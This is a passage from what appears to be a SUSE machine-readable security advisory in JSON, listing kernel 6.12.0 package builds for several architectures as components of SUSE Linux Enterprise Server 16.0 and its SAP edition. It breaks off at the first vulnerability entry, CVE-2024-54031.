"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-source-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-vanilla-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-devel-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-extra-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64"
},
"product_reference": "kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-devel-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-extra-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-extra-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-default-vdso-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-devel-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-docs-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-docs-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-docs-html-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-docs-html-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-macros-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-macros-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-obs-qa-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-source-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-vanilla-6.12.0-160000.26.1.noarch as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch"
},
"product_reference": "kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-syms-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64"
},
"product_reference": "kernel-syms-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
},
"product_reference": "kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-54031",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54031"
}
],
"notes": [
{
"category": "general",
